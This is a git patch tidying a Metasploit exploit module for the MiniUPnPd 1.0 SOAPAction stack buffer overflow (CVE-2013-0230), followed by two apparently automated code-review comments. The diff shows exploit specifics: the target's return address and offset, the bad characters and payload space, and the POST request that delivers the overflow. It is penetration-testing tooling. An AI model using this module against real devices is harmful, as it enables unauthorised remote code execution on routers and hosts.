From 3111013991e6ee87487b0c892e1f15e8d0a8617d Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 4 Jun 2013 08:53:52 -0500
Subject: [PATCH] Minor cleanup for miniupnpd_soap_bof

---
 .../exploits/linux/upnp/miniupnpd_soap_bof.rb | 70 +++++++++++--------
 1 file changed, 42 insertions(+), 28 deletions(-)

diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
index 8573869732..58d4070288 100644
--- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
+++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
@@ -9,41 +9,56 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpClient
- Rank = NormalRanking
+ Rank = NormalRanking
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
- 'Description' =>
- %q{
- This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability present
- in the SOAPAction HTTP header.
- },
- 'Author' => [ 'Dejan Lukan' ],
- 'License' => MSF_LICENSE,
- 'DefaultOptions' => { 'EXITFUNC' => 'process', },
+ 'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
+ 'Description' => %q{
+ This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
+ present in the SOAPAction HTTP header handling.
+ },
+ 'Author' =>
+ [
+ 'hdm', # Vulnerability discovery
+ 'Dejan Lukan' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'DefaultOptions' => { 'EXITFUNC' => 'process', },
 # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
 # input, which is why it can't be part of the shellcode (otherwise the vulnerable part
 # of the program is never reached)
- 'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
- 'Platform' => 'linux',
- 'References' => [
- [ 'CVE', '2013-0230' ],
- [ 'OSVDB', '89624' ],
- ],
- 'Targets' =>
+ 'Payload' =>
+ {
+ 'Space' => 2060,
+ 'BadChars' => "\x00\x22",
+ 'DisableNops' => true
+ },
+ 'Platform' => 'linux',
+ 'References' =>
 [
- ['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
+ [ 'CVE', '2013-0230' ],
+ [ 'OSVDB', '89624' ],
+ [ 'BID', '57608' ],
+ [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
 ],
- 'DefaultTarget' => 0,
- 'Privileged' => false,
- 'DisclosureDate' => 'Mar 27 2013',
- ))
+ 'Targets' =>
+ [
+ [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
+ {
+ 'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
+ 'Offset' => 2123
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Mar 27 2013',
+ ))
- register_options(
- [
- Opt::RPORT(5555),
- ], self.class)
+ register_options([
+ Opt::RPORT(5555),
+ ], self.class)
 end
 def exploit
@@ -92,14 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote
 "\r\n" +
 "\r\n"
- #
 # Build and send the HTTP request
 #
 print_status("Sending exploit to victim #{target.name} at ...")
 send_request_cgi({
 'method' => 'POST',
- 'uri' => target_uri.path,
+ 'uri' => "/",
 'headers' => {
 'SOAPAction' => sploit,
 },
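Review bot: The metadata the commit rewrites keeps `'DisclosureDate' => 'Mar 27 2013'`, yet the newly added URL reference is dated 2013/01/29 and the CVE added alongside it is from the same disclosure, so the disclosure date looks stale and should be confirmed against the advisory before the module ships; this is the one point in the hunk a reader will trip over. A smaller point of style: `'DefaultOptions' => { 'EXITFUNC' => 'process', }` carries a trailing comma inside a one-line hash and `'Targets'` closes with `],` after its only entry, both of which the cleanup could have dropped. The whole of `initialize` is inside this hunk, so nothing of it is hidden.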
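Review bot: Hard-coding `'uri' => "/"` on the added line removes the `target_uri.path` lookup, so if the module (or its HttpClient mixin) still exposes a TARGETURI option, a user-supplied path is now silently ignored; the options visible in the first hunk register only RPORT, so this may be intended, but it deserves a one-line comment such as `# request path is fixed to "/"; TARGETURI is not consulted` next to the literal. The unchanged `print_status("Sending exploit to victim #{target.name} at ...")` in the same hunk still prints a literal " at ..." placeholder, which the cleanup could have filled in or trimmed to `"Sending exploit to #{target.name}"`. The `exploit` method starts before this hunk and continues after it.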